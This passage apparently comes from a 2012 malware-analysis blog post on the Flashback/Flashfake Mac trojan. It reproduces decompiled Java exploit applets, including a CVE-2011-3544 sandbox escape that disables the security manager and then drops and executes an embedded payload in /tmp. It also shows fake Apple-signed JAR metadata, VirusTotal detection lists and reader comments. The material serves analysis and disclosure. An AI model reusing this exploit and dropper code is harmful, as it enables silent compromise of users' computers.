        -26, 99, -58, -71, 87, 24, -30, -36, 65, 30,
        -128, -127, -41, -50, -54, -114, 115, -33, 53, -117,
        -57, -71, -85, 87, -14, 56, -8, -1, 105, -100,
        -69, 90, -55, -1, -24, 91, 91, 57, 58, -50,
        125, 42, -53, 29, -25, -98, -114, 113, -65, -14,
        -18, -32, -93, 47, -65, 49, -21, -115, 123, -118,
        59, -105, 61, -43, 122, 71, -79, 24, -125, 84,
        -8, 53, 52, -118, -16, -3, -111, -117, -80, -17,
        14, -10, -89, -115, 61, -57, 62, 90, -39, 31,
        55, -18, -68, 92, -100, -5, -4, 33, 49, -25,
        -58, 54, -25, 18, 111, 110, -58, -102, 127, 53,
        105, 35, -45, -34, -18, 27, 57, -43, 119, -46,
        22, -67, -55, -86, -83, -75, -77, 88, 83, -103,
        -26, -74, 91, -5, 14, 72, -49, -3, -42, 34,
        -3, 10, -96, -78, 104, 81, -33, 1, 107, -1,
        80, -9, 71, 32, -108, -57, 43, 49, -118, -96,
        -34, -50, -30, -9, 97, 28, 1, -7, 30, -82,
        73, 14, 30, -126, -9, 73, -76, -9, 13, 120,
        -91, 36, -33, -28, 88, -76, -9, -41, 36, -75,
        105, 111, -81, 94, -43, -46, 119, 114, -111, -10,
        -86, -42, 52, 28, -99, -116, 111, -29, -24, 56,
        -83, 105, -92, -26, 5, 77, 126, -23, 80, -67,
        -99, -34, 102, -96, -47, 122, -56, 106, -57, -53,
        120, 57, 40, -114, 78, -34, -127, -11, 38, 105,
        -83, -10, 114, 40, 43, -125, 122, 86, 124, -1,
        -92, -22, -20, -127, 23, -124, 118, -96, -1, 67,
        -11, 34, 77, -27, -91, 123, -96, 84, -77, -38,
        -29, -113, 96, -55, -38, -116, -74, 31, -94, -36,
        112, 4, -117, -18, -125, 75, 30, 94, 16, -37,
        98, -73, 69, 27, -122, -93, -43, -121, 26, -48,
        17, -104, -67, 59, 25, 39, -86, 109, -79, 91,
        -75, 121, -10, -8, 111, -96, -98, 116, 66, -70,
        -23, 24, -114, 14, 35, 13, -80, 32, -38, 118,
        68, -69, -56, 30, 95, -51, 59, 30, -70, -29,
        112, 84, 126, 41, -38, 112, 44, 58, -98, 38,
        -44, 54, 66, 113, 6, -35, 80, 26, -109, 79,
        -33, -8, 109, 12, 48, -96, -119, -33, 121, 114,
        7, 76, -16, 33, -86, 100, -45, -38, 70, 106,
        -114, -126, -46, 114, 124, 8, 81, 57, -122, 22,
        -32, -32, -15, -36, 10, 6, 92, 4, 125, -59,
        59, -79, -121, 126, -11, -93, 100, -78, -82, -5,
        -30, -8, -76, 34, 30, 93, 80, -98, -102, -49,
        -12, 34, -34, 20, -73, 115, 106, -118, 39, -99,
        -29, -49, -32, -20, -53, -19, 113, 123, -114, -46,
        -121, -16, 52, 11, -25, 95, -118, -123, -3, 111,
        -118, -72, -125, 24, 93, -95, -31, -93, -109, -87,
        57, -52, -18, -89, 22, -34, 108, 28, 12, -28,
        -95, 31, -32, -104, -87, -31, 118, -128, -75, -25,
        31, 122, 0, -127, 90, 28, 63, -35, -78, 45,
        -36, -16, -61, -40, 22, -84, -26, -75, 112, -53,
        -88, 115, 80, 106, -30, -102, -88, 102, 106, 64,
        -47, -15, 52, 18, 88, 94, -38, 84, 123, 124,
        6, -42, -121, -4, 124, -56, 99, 59, -73, -32,
        88, -8, 109, -85, 68, 43, 68, 44, -36, -15,
        -2, 46, 104, -97, -72, 86, -104, 105, 17, 14,
        -21, -108, -72, -47, 87, -92, -6, 107, -121, 57,
        -108, 99, 31, 104, 85, 88, 14, -42, 104, -1,
        113, -44, 6, 117, -118, 68, 31, -65, 23, 10,
        48, 38, 33, -83, -32, 112, 90, 16, 11, -20,
        27, -72, 50, 118, -114, 124, 6, 109, -95, -51,
        -69, 82, 118, 91, -22, -4, 76, 106, -107, 97,
        -31, -13, -48, 121, 32, -10, -20, 8, 116, 102,
        -76, -71, -74, -56, 30, 127, 64, -94, -31, -92,
        -121, 70, 101, 86, 94, -74, 49, 21, -86, -112,
        -81, 66, 35, 0, 75, 49, 96, -31, 4, 90,
        -45, 33, -31, 35, -111, -70, 75, 62, -108, 104,
        -123, -96, -123, 98, -72, 0, 98, 40, -31, 2,
        -72, 10, 35, 24, 110, 19, -106, 116, -93, 37,
        -81, 18, 33, 12, -75, 73, 24, -90, -43, 78,
        65, 12, -1, -119, 61, -109, -107, 82, 15, 32,
        95, 36, 48, 0, -20, -4, 118, 44, 62, -112,
        46, 58, 89, -111, 41, -14, 1, 16, -117, -111,
        125, 95, -113, 87, -100, -127, -20, 121, 17, -52,
        -16, -38, -39, 100, 50, -79, -118, -126, 25, -60,
        83, -34, 52, 50, 119, 28, 60, 20, -21, -96,
        -55, -99, 7, -15, 49, -96, -25, -126, 37, 43,
        -15, -85, 46, 89, 89, 65, -36, 78, 124, 54,
        -15, 107, -120, 87, 19, -97, 71, -68, -106, -8,
        34, -30, 117, -60, -21, -119, -69, -120, -69, -119,
        55, 19, 111, 37, -66, -122, -8, 90, -30, -21,
        -120, 119, 16, -9, 19, 15, 18, 15, 19, 87,
        -119, -9, 16, -33, 66, -68, -105, -8, 86, -30,
        -37, -120, 111, 7, -34, -73, 120, 23, 110, -11,
        -35, -29, -47, 2, 107, -66, 107, -75, 39, -54,
        96, -127, -12, 29, -76, -6, 31, -95, 58, 88,
        74, -79, 12, 126, -100, -107, 46, -110, -63, -113,
        -13, 75, 60, -101, -114, 99, -16, -29, 76, 19,
        -113, -91, -93, 24, -4, 56, -25, -60, -50, 116,
        12, -125, 31, 103, -97, -120, -91, 35, 24, -4,
        104, -121, -60, 109, -23, -8, 5, 63, 90, 36,
        -47, -103, -114, 94, -16, -93, 109, 18, 55, -91,
        99, 23, -4, 104, -91, 68, 83, 58, 114, -63,
        -113, -10, 18, -111, 12, 24, -73, -32, 71, -53,
        37, -82, 37, 25, 87, -105, 31, 109, -104, -104,
        70, -78, 31, 101, -76, 102, 98, 60, -55, 91,
        81, 70, -69, 38, 62, 39, -65, -2, 123, 81,
        70, 11, 39, -34, 35, 25, 127, 42, -15, -93,
        -83, 19, -1, 70, 50, -58, -17, -8, -41, -46,
        -4, 73, 126, 25, -27, 117, 52, 127, -110, -1,
        21, -27, -114, -118, 116, 36, 3, 70, 41, -8,
        -3, 52, 127, -110, -15, -71, -12, 7, 105, -2,
        36, -113, -121, -25, -42, 31, -90, -7, -109, 124,
        57, -54, 42, -51, -97, -28, -85, 80, -18, -95,
        -7, -109, -68, 16, -27, 45, 52, 127, -110, -65,
        -119, 114, 47, -51, -97, -28, 111, -95, -68, -107,
        -26, 79, -14, 6, -108, -73, 85, -92, 35, 25,
        -18, 64, 121, 59, -51, 31, 101, -58, -66, -54,
        49, 9, -87, 120, 4, 102, -56, 45, -70, -33,
        1, 49, 125, 50, 33, 35, -13, 88, 4, 9,
        -66, -107, 115, -4, 39, 38, -37, -101, -33, 47,
        -125, -124, 31, -46, 35, 96, -93, 55, 33, 29,
        -81, -32, 127, -49, -52, -124, 63, -62, -26, 64,
        90, 50, -115, -5, -31, -73, 67, 82, 32, -35,
        5, -23, 30, 72, 15, 67, 122, 2, -46, 126,
        72, 71, -89, 113, 95, -5, 15, 32, 89, -32,
        111, -37, 73, -112, 102, 66, -102, 3, 105, 9,
        -92, -107, -112, -38, 33, 41, -45, -71, 79, -5,
        61, -112, 30, -122, -12, 4, -92, -3, -112, -114,
        66, 122, 107, 122, -31, -17, 25, -12, -119, 63,
        -83, -5, -1, 118, 40, 127, 60, 61, -29, 59,
        -113, -14, -59, 51, -14, -8, -54, -61, -4, -74,
        66, -39, -33, -52, -56, -8, -60, -29, -33, 91,
        21, -107, -26, 119, -94, 73, 38, -103, 100, -110,
        73, 38, -103, 100, -110, 73, 38, -103, 100, -110,
        73, -1, -9, 41, -113, -1, -1, 14, 41, 111,
        0, -128, -14, 3, 41, 79, 12, -64, -128, -108,
        35, 8, -96, -73, -4, -36, -126, 0, -84, 67,
        -106, -14, 124, 49, 0, 15, 72, 3, -54, -44,
        49, -3, -1, 43, -50, -47, -1, -33, 126, -114,
        -2, -1, -77, -13, -8, -1, 95, -109, -57, -1,
        -65, -38, -24, -1, 63, 111, 44, -1, -1, -38,
        -68, -2, -1, -117, 10, -7, -1, -41, -27, -10,
        -1, -81, 63, 55, -9, 127, 87, 97, -17, 127,
        119, 1, -25, -1, -26, 108, -33, -1, -42, 60,
        -82, -1, 107, 82, -98, -1, -10, -74, -27, -115,
        107, -26, 84, 87, -49, 69, 116, -83, 46, 2,
        96, 93, 86, 0, 64, -121, -34, -1, -33, -97,
        118, -1, -49, 106, 29, -52, 10, 3, 8, 103,
        69, 1, -88, 89, 65, 0, 61, -58, 24, -128,
        45, -122, 16, -128, 94, 67, 8, -64, 86, 73,
        31, 2, 32, -91, 67, 0, -78, -6, -33, 46,
        25, 98, 1, -2, -105, -30, 0, 122, 116, 113,
        0, -23, 24, 0, 91, -74, -1, -65, -34, -9,
        95, -17, -9, -81, -9, -7, -41, -5, -5, -21,
        125, -3, -11, 126, -2, 122, 31, 127, -67, 127,
        -65, -34, -73, 95, -17, -41, -81, -9, -23, -41,
        -5, -13, -21, 125, -7, -11, 126, -4, 122, 31,
        126, -67, -1, -66, -34, 119, -1, 113, -35, -11,
        -49, 117, -41, -49, -24, -82, 15, -24, -82, -113,
        -23, -6, 74, -24, 124, -12, -49, -24, -4, -13,
        39, -23, 124, -29, 47, -45, 93, -49, -44, 93,
        95, -83, -69, -98, -81, -69, -2, -122, -18, -38,
        -91, -69, 94, -82, -69, -10, -24, -82, 55, -24,
        -4, -18, -15, 55, -51, 9, -116, -107, -17, 17,
        -7, -80, -56, -65, 8, 63, -9, 47, -94, 79,
        -12, -17, 79, -7, -10, 95, -54, -105, 115, -99,
        72, -90, -49, -3, -105, -36, -25, 62, -13, -14,
        43, -28, 124, -81, -85, -11, 69, 123, -31, -21,
        -122, 114, -82, -18, -8, -1, 13, -72, 48, -16,
        12
    ];
    private static String dropFile = "/tmp/.sysenter";

]


 JAR signature files carrying Apple information. DAS and SF files. I think it is something you can fake  - "use the JAR Signing and Verification Tool to sign JAR files"

File: SUNMS.SF
Strings
Signature-Version: 1.0
SHA1-Digest-Manifest-Main-Attributes: fPlIJrwM0qYddN2iT3wv1BXlT9s=
Created-By: 1.6.0_17 (Apple Inc.)
SHA1-Digest-Manifest: h1REtbMLPS/h4zSUFRfF4WfRv7g=
Name: javaupdate/JavaUpdate.class
SHA1-Digest: f+I4wjROuXtwlvNBuO9QqMeJIqU=
Name: javaupdate/Payload.class
SHA1-Digest: asgEt/q0WVR8JnKO4gSmSgm+Tao=

File: SUNMS.DSA

Strings
 -Cupertino1
Apple Inc.1
Apple Inc.1
Apple Inc.0
120206180202Z
120506180202Z0m1
Cupertino1
Apple Inc.1
Apple Inc.1
Apple Inc.0
Q&iE]@"Q
gQYW
{U%d
staQ_&
0u0m1
Cupertino1
Apple Inc.1
Apple Inc.1
Apple Inc.

=========================================================================
SAMPLE 3 Virustotal
JAVA 2011- 3544 
MD5:  B134EDEACD2660FA08F2F5A2EA916512
First seen by VirusTotal 2012-02-09 09:57:50 UTC ( 2 months, 1 week ago )
rhcls.java Virustotal  {} are replaced by [] to prevent issues with blogger page saving posting and AV alerts

// Source File Name:   rhcls.java

import java.applet.Applet;
import java.io.*;
import java.util.zip.DataFormatException;
import java.util.zip.Inflater;
import javax.script.*;
import javax.swing.JList;

public class rhcls extends Applet
[

    public rhcls()
    [
        ldr_data = new byte[11803];
    ]

    public void init0()
    [
        ldr_data[0] = 120;
        ldr_data[1] = -38;
       
        ldr_data[65] = 31;
        ldr_data[66] = 109;
        ldr_data[67] = -79;
-------------------------------------REDACTED TO SHORTEN--------------------------       
        ldr_data[11801] = -122;
        ldr_data[11802] = -89;
    ]

    public void init()
    [
        try
        [
            ScriptEngine engine = (new ScriptEngineManager()).getEngineByName("js");
            Bindings b = engine.createBindings();
            b.put("applet", this);
            Object proxy = engine.eval("this.toString = function() [\tjava.lang.System.setSecurityManager(null);\tapplet.callBack();\treturn String.fromCharCode(97 + Math.round(Math.random() * 25));];e = new Error();e.message = this;e", b);
            JList list = new JList(new Object[] [
                proxy
            ]);
            add(list);
        ]
        catch(ScriptException e)
        [
            e.printStackTrace();
        ]
    ]

    public void callBack()
    [
        try
        [
            init0();
            init1();
            init2();
            init3();
            init4();
            init5();
            init6();
            init7();
            init8();
            init9();
            init10();
            init11();
            Inflater decompressor = new Inflater();
            decompressor.setInput(ldr_data);
            ByteArrayOutputStream bos = new ByteArrayOutputStream(ldr_data.length);
            byte buf[] = new byte[1024];
            while(!decompressor.finished())
                try
                [
                    int count = decompressor.inflate(buf);
                    bos.write(buf, 0, count);
                ]
                catch(DataFormatException e) [ ]
            bos.close();
            byte decompressedData[] = bos.toByteArray();
            saveFile(dropFile, decompressedData);
            String params[] = [
                "chmod", "777", dropFile
            ];
            Process p = Runtime.getRuntime().exec(params);
            int val = p.waitFor();
            String paramstwo[] = [
                "nohup", dropFile, "&"
            ];
            Process p2 = Runtime.getRuntime().exec(paramstwo);
            int valtwo = p2.waitFor();
        ]
        catch(Exception ex)
        [
            ex.printStackTrace();
        ]
    ]

    private void saveFile(String fileName, byte content[])
        throws IOException
    [
        OutputStream os = new FileOutputStream(fileName);
        os.write(content);
        os.close();
    ]

    private byte[] loadFileFromResources(String fileName)
        throws IOException
    [
        InputStream fin = getClass().getResourceAsStream(fileName);
        byte readBuf[] = new byte[0x4b000];
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        for(int readCnt = fin.read(readBuf); 0 < readCnt; readCnt = fin.read(readBuf))
            bout.write(readBuf, 0, readCnt);

        fin.close();
        return bout.toByteArray();
    ]

    private static String dropFile = "/tmp/.sysenterxx";
    byte ldr_data[];

]


Automated scans

Virustotal
SHA256:     e64949f0f505be0b027c2862daecbd4e36702f0cf27f4d9f47d06b8a3d7cd241
SHA1:     42ef0a55690a8e12949e3c6055a322d7cfcb9cd0
MD5:     0bb60cde26e022b8044149f7da138c1f
File size:     25.3 KB ( 25891 bytes )
File name:     e64949f0f505be0b027c2862daecbd4e36702f0cf27f4d9f47d06b8a3d7cd241.jar
Detection ratio:     25 / 42
Analysis date:     2012-04-17 02:55:59 UTC ( 1 minute ago )
AntiVir     EXP/2008-5353.AK.1     20120416
Antiy-AVL     Trojan/Java.Flashfake     20120416
Avast     Java:CVE-2012-0507-L [Expl]     20120417
BitDefender     Exploit.Java.CVE-2012-0507.N     20120417
ClamAV     Trojan.Flashfake-7     20120417
Comodo     UnclassifiedMalware     20120417
DrWeb     Exploit.CVE2012-0507.3     20120417
Emsisoft     Trojan-Dropper.Java.Flashfake!IK     20120417
eSafe     Win32.Trojan     20120415
eTrust-Vet     Java/CVE-2012-0507!exploit     20120417
F-Secure     Exploit.Java.CVE-2012-0507.N     20120417
Fortinet     W32/OSX_Flashfake.V!tr.dldr     20120416
GData     Exploit.Java.CVE-2012-0507.N     20120417
Ikarus     Trojan-Dropper.Java.Flashfake     20120417
Jiangmin     TrojanDropper.Java.k     20120416
Kaspersky     Trojan-Dropper.Java.Flashfake.b     20120417
McAfee     JV/Exploit-Blacole.e     20120416
McAfee-GW-Edition     OSX/Flashfake.c     20120416
Microsoft     Exploit:Java/CVE-2012-0507.D!ldr     20120416
NOD32     Java/Exploit.CVE-2008-5353.C     20120417
nProtect     Exploit.Java.CVE-2012-0507.N     20120417
Sophos     Troj/JavaDl-JI     20120417
SUPERAntiSpyware     -     20120402
Symantec     Trojan.Gen.2     20120417
TrendMicro     OSX_FLASHBACK.EV     20120416
TrendMicro-HouseCall     OSX_FLASHBACK.EV     20120416

Virustotal
SHA256:     1d24affa137a355a9963d1aba438b66753e62a00ce07d80626f399b600f1f00e
SHA1:     274a483583a965d7e3e3f518115684adf56c7e0a
MD5:     ae7bbf2410b0efd0cbf1410ea41e07c6
File size:     55.8 KB ( 57188 bytes )
File name:     xnm
File type:    OSX binary
Detection ratio:     23 / 42
Analysis date:     2012-04-17 02:47:05 UTC ( 0 minutes ago )
Antiy-AVL     Trojan/OSX.Flashfake     20120416
Avast     MacOS:Flashback-L [Drp]     20120417
BitDefender     MAC.OSX.Trojan.FlashBack.N     20120417
ClamAV     OSX.Flashback-9     20120417
Comodo     UnclassifiedMalware     20120417
DrWeb     BackDoor.Flashback.35     20120417
Emsisoft     Trojan-Downloader.OSX.Flashfake!IK     20120417
eSafe     Win32.Trojan     20120415
F-Secure     MAC.OSX.Trojan.FlashBack.N     20120417
Fortinet     W32/OSX_Flashfake.V!tr.dldr     20120416
GData     MAC.OSX.Trojan.FlashBack.N     20120417
Ikarus     Trojan-Downloader.OSX.Flashfake     20120417
Jiangmin     TrojanDownloader.OSX.p     20120416
Kaspersky     Trojan-Downloader.OSX.Flashfake.v     20120417
McAfee     OSX/Flashfake.c     20120416
McAfee-GW-Edition     OSX/Flashfake.c     20120416
Microsoft     Backdoor:MacOS_X/Flashback.F     20120416
NOD32     OSX/Flashback.J     20120417
nProtect     MAC.OSX.Trojan.FlashBack.N     20120417
Sophos     OSX/Flshplyr-B     20120417
Symantec     OSX.Flashback.K     20120417
TrendMicro     OSX_FLASHBACK.EV     20120416
TrendMicro-HouseCall     OSX_FLASHBACK.EV     20120417

Virustotal
 SHA256:     8fbf88d0478777e43438dd1edab757760fe145ac53993b2f047494016d163ff0
SHA1:     ad716b284fef394bed3a99774bbf27c5da9e248c
MD5:     d9d193658ea1555124854c3c827e4391
File size:     20.5 KB ( 20989 bytes )
File name:     8fbf88d0478777e43438dd1edab757760fe145ac53993b2f047494016d163ff0.jar
File type:     JAR
Detection ratio:     21 / 42
Analysis date:     2012-04-16 22:54:38 UTC ( 3 hours, 56 minutes ago )
Antiy-AVL     Trojan/win32.agent     20120416
Avast     Java:Agent-ATC [Expl]     20120416
AVG     Java/Exploit.APA     20120417
BitDefender     Java.Trojan.Dropper.A     20120417
Comodo     UnclassifiedMalware     20120416
DrWeb     Java.Dropper.8     20120417
Emsisoft     Java.Trojan-Dropper!IK     20120416
eTrust-Vet     Java/Flashfake.A     20120416
F-Secure     Java.Trojan.Dropper.A     20120417
Fortinet     Java/Agent.EB     20120416
GData     Java.Trojan.Dropper.A     20120417
Ikarus     Java.Trojan-Dropper     20120416
Kaspersky     Trojan-Dropper.Java.Flashfake.a     20120416
McAfee     OSX/Flashfake     20120416
McAfee-GW-Edition     OSX/Flashfake     20120416
NOD32     Java/Agent.EB     20120416
Norman     -     20120416
nProtect     Java.Trojan.Dropper.A     20120416
Sophos     Mal/JavaKC-B     20120416
SUPERAntiSpyware     -     20120402
Symantec     OSX.Flashback     201204
TrendMicro     JAVA_DROPPR.IC     20120416
TrendMicro-HouseCall     JAVA_DROPPR.IC     20120416

Virustotal
SHA256:     ab925167124a61228d6d8f4c9b04813f5382fc2c916e29ee9bef417c7d2054b5
SHA1:     8071e88e27d9655b8c4f7c30a3e18a0bec3200f1
MD5:     b134edeacd2660fa08f2f5a2ea916512
File size:     44.7 KB ( 45797 bytes )
File name:     B134EDEACD2660FA08F2F5A2EA916512
Detection ratio:     24 / 42
Analysis date:     2012-04-17 03:04:15 UTC ( 2 minutes ago )
AntiVir     EXP/CVE-2011-3544.BC     20120416
Antiy-AVL     Exploit/Java.CVE-2011-3544     20120416
Avast     Java:CVE-2011-3544-G [Expl]     20120417
AVG     Downloader.Generic_c.DCT     20120417
BitDefender     Java.Exploit.CVE-2011-3544.A     20120417
ClamAV     CVE-2011-3544.Java     20120417
DrWeb     Exploit.CVE2011-3544.34     20120417
Emsisoft     Exploit.Java.CVE!IK     20120417
eTrust-Vet     Java/CVE-2011-3544!exploit     20120417
F-Secure     Exploit:Java/Flashback.F     20120417
Fortinet     Java/CVE_2011_3544.GX!exploit     20120416
GData     Java.Exploit.CVE-2011-3544.A     20120417
Ikarus     Exploit.Java.CVE     20120417
Kaspersky     Exploit.Java.CVE-2011-3544.gx     20120417
Microsoft     Exploit:Java/CVE-2011-3544.BY     20120416
NOD32     Java/Exploit.CVE-2011-3544.N     20120417
nProtect     Java.Exploit.CVE-2011-3544.A     20120417
Sophos     Mal/20113544-A     20120417
SUPERAntiSpyware     -     20120402
Symantec     OSX.Flashback     20120417
TrendMicro     JAVA_DROPPR.IC     20120416
TrendMicro-HouseCall     JAVA_DROPPR.IC     20120417
VBA32     Exploit.Java.CVE-2011-3544.gx     20120416
VIPRE     Trojan.Java.Generic (v)     20120416

4 comments:

  1. There were some news that kaspersky had some software that could fight this flashfake but simultaneously damages the system therefore they have not to distribute this tool. Java and Flash player are heaven for malware unfortunately

    ReplyDelete
  2. Apple issued a fix/removal/patch a few days ago so just update your mac.
    F-secure and dr.Web have tools too.

    ReplyDelete
  3. Number 2 is not any CVE, it is good old java_signed_applet social engineering exploit. Will show a scary message that you are executing code claiming from "Apple Inc." but whose identity cannot be identified, and hopes the user will click "Run" anyway. Will work on any Java version (starting from 1.2 or so), but requires user interaction.

    The other two CVE numbers look right. Thanks for showing the decompiled versions in your blog, saves some time!


    C:\Temp>jarsigner -verbose -certs -verify D9D193658EA1555124854C3C827E4391

    217 Mon Feb 06 12:02:02 CET 2012 META-INF/MANIFEST.MF
    338 Mon Feb 06 12:02:02 CET 2012 META-INF/SUNMS.SF
    1050 Mon Feb 06 12:02:02 CET 2012 META-INF/SUNMS.DSA
    0 Mon Feb 06 12:01:50 CET 2012 META-INF/
    sm 525 Mon Feb 06 12:01:50 CET 2012 javaupdate/JavaUpdate.class

    X.509, CN=Apple Inc., OU=Apple Inc., O=Apple Inc., L=Cupertino, ST=CA, C=US
    [certificate will expire on 06.05.12 20:02]

    sm 35864 Mon Feb 06 12:01:50 CET 2012 javaupdate/Payload.class

    X.509, CN=Apple Inc., OU=Apple Inc., O=Apple Inc., L=Cupertino, ST=CA, C=US
    [certificate will expire on 06.05.12 20:02]


    s = signature was verified
    m = entry is listed in manifest
    k = at least one certificate was found in keystore
    i = at least one certificate was found in identity scope

    jar verified.

    Warning:
    This jar contains entries whose signer certificate will expire within six months.

    ReplyDelete